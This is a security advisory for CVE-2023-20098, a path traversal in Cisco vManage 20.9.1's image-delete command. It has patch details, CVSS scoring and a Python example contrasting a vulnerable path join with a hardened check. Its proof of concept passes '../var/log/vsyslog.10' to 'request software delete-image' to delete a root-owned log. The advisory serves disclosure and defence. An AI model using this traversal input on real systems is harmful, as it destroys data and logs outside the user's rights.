Cisco vManage - Unauthorized data access (CVE-2023-20098)

Moderate
orange-cert-cc published GHSA-5j43-q336-92ch May 9, 2023

Package

vManager (Cisco)

Affected versions

20.9.1

Patched versions

20.9.3
20.11

Description

Overview

Loss of vManage firmware image availability

Details

On vManage 20.9.1, CLI users with access to the “request software delete-image” command can delete files outside the /images directory.
Below is a demo of deleting a log file that I do not have rights to delete directly from the shell.
This command does not exist in 20.6.4, so current production versions are not affected.

Proof of Concept

The following commands were executed as a standard user (not root):

BGE-VDR-vMM-2:/var/log$ ls -l vsyslog*
-rw-r--r-- 1 root adm   4204176 Oct 27 08:56 vsyslog
-rw-r--r-- 1 root adm  10485911 Oct 25 21:53 vsyslog.1
-rw-r--r-- 1 root root 10485838 Sep  8 11:45 vsyslog.10
-rw-r--r-- 1 root adm  10485942 Oct 22 05:36 vsyslog.2
-rw-r--r-- 1 root adm  10485834 Oct 18 13:24 vsyslog.3
-rw-r--r-- 1 root adm  10486296 Oct 14 21:24 vsyslog.4
-rw-r--r-- 1 root adm  10488153 Oct 11 05:24 vsyslog.5
-rw-r--r-- 1 root adm  10486362 Oct  7 13:16 vsyslog.6
-rw-r--r-- 1 root adm  10485894 Oct  3 23:26 vsyslog.7
-rw-r--r-- 1 root adm  10485851 Sep 30 07:25 vsyslog.8
-rw-r--r-- 1 root adm  10485910 Sep 26 15:38 vsyslog.9
BGE-VDR-vMM-2:/var/log$ rm vsyslog.10
rm: remove write-protected regular file 'vsyslog.10'? y
rm: cannot remove 'vsyslog.10': Permission denied
BGE-VDR-vMM-2:/var/log$ exit
exit
BGE-VDR-vMM-2# request software delete-image ../var/log/vsyslog.10
status Deleted /images/../var/log/vsyslog.10
BGE-VDR-vMM-2# vs
BGE-VDR-vMM-2:~$ ls -l /var/log/vsyslog.*
-rw-r--r-- 1 root adm 10485911 Oct 25 21:53 /var/log/vsyslog.1
-rw-r--r-- 1 root adm 10485942 Oct 22 05:36 /var/log/vsyslog.2
-rw-r--r-- 1 root adm 10485834 Oct 18 13:24 /var/log/vsyslog.3
-rw-r--r-- 1 root adm 10486296 Oct 14 21:24 /var/log/vsyslog.4
-rw-r--r-- 1 root adm 10488153 Oct 11 05:24 /var/log/vsyslog.5
-rw-r--r-- 1 root adm 10486362 Oct  7 13:16 /var/log/vsyslog.6
-rw-r--r-- 1 root adm 10485894 Oct  3 23:26 /var/log/vsyslog.7
-rw-r--r-- 1 root adm 10485851 Sep 30 07:25 /var/log/vsyslog.8
-rw-r--r-- 1 root adm 10485910 Sep 26 15:38 /var/log/vsyslog.9
BGE-VDR-vMM-2:~$ exit
exit
BGE-VDR-vMM-2# show ver
20.9.1
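The session above shows the root cause: the image name supplied to the command is joined onto /images and passed straight to the delete, so "../var/log/vsyslog.10" resolves to "/images/../var/log/vsyslog.10" and escapes the store. The Python below is an added example, not Cisco's code, that places that naive join beside a confined version which canonicalises the path, refuses symlinked entries, and requires the result to stay strictly under the image directory. The directory tree, the image file name and the planted symlink are constructed sample data built in a temporary directory; only the "../var/log/vsyslog.10" name is taken from the advisory.

```python
import os
import shutil
import tempfile


def naive_delete_path(root, name):
    """Vulnerable pattern: join the operator-supplied name onto the image
    directory and trust the result. '../var/log/vsyslog.10' becomes
    root/../var/log/vsyslog.10, which resolves outside root, matching the
    advisory's status line 'Deleted /images/../var/log/vsyslog.10'."""
    return os.path.join(root, name)


def confined_delete_path(root, name):
    """Hardened form: canonicalise root and target (resolving '..' and
    symlinks), refuse symlinked directory entries, and require the target to
    be a regular file strictly inside root. Returns the path safe to unlink."""
    if not name or os.path.isabs(name):
        raise ValueError("image name must be a relative file name")
    real_root = os.path.realpath(root)
    candidate = os.path.join(real_root, name)
    if os.path.islink(candidate):
        raise ValueError("symlinked image entries are not allowed")
    real_target = os.path.realpath(candidate)
    if real_target == real_root or os.path.commonpath([real_root, real_target]) != real_root:
        raise ValueError(f"{name!r} resolves outside {root}")
    if not os.path.isfile(real_target):
        raise FileNotFoundError(name)
    return real_target


def delete_image(root, name):
    """Delete an image only after the confinement check has passed."""
    target = confined_delete_path(root, name)
    os.remove(target)
    return target


def demo():
    """Build a throwaway tree mirroring the advisory's layout (constructed
    sample data, hypothetical names): <base>/images holding one image and
    <base>/var/log/vsyslog.10, which must survive every delete request that
    is routed through the image command."""
    base = tempfile.mkdtemp()
    try:
        images = os.path.join(base, "images")
        logs = os.path.join(base, "var", "log")
        os.makedirs(images)
        os.makedirs(logs)
        log_file = os.path.join(logs, "vsyslog.10")
        image_file = os.path.join(images, "example-image.tar.gz")
        for path in (log_file, image_file):
            with open(path, "w") as fh:
                fh.write("sample\n")
        # A symlink planted inside the store that points at the log file.
        os.symlink(log_file, os.path.join(images, "planted.img"))

        results = {}
        # 1. The naive join produces a path that lands on the log file.
        naive = naive_delete_path(images, "../var/log/vsyslog.10")
        results["naive_escapes"] = os.path.realpath(naive) == os.path.realpath(log_file)
        # 2. The confined version rejects traversal, absolute paths and symlinks.
        cases = {"traversal": "../var/log/vsyslog.10",
                 "absolute": log_file,
                 "symlink": "planted.img"}
        for label, bad in cases.items():
            try:
                confined_delete_path(images, bad)
                results[label] = "accepted"
            except ValueError:
                results[label] = "rejected"
        # 3. A legitimate image inside the store is still deletable.
        delete_image(images, "example-image.tar.gz")
        results["image_deleted"] = not os.path.exists(image_file)
        results["log_survived"] = os.path.exists(log_file)
        return results
    finally:
        shutil.rmtree(base)


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The check canonicalises the root as well as the target because the store itself may sit behind a symlink (as /tmp does on some systems), and it compares with commonpath rather than a string prefix so that a sibling directory such as /images-old is not mistaken for a child of /images.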

Solution

Security patch

Upgrade to a patched Cisco IOS release, as described in the Cisco Security Advisory.

References

https://nvd.nist.gov/vuln/detail/CVE-2023-20098
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iox-priv-escalate-Xg8zkyPk

Credits

Orange CERT-CC
Frederic MEZOU at Orange Business

Timeline

Date reported: October 28, 2022
Date fixed: April 19, 2023

Severity

Moderate
4.4 / 10

CVSS base metrics

Attack vector
Local
Attack complexity
Low
Privileges required
High
User interaction
None
Scope
Unchanged
Confidentiality
None
Integrity
High
Availability
None
CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:N

CVE ID

CVE-2023-20098

Weaknesses

No CWEs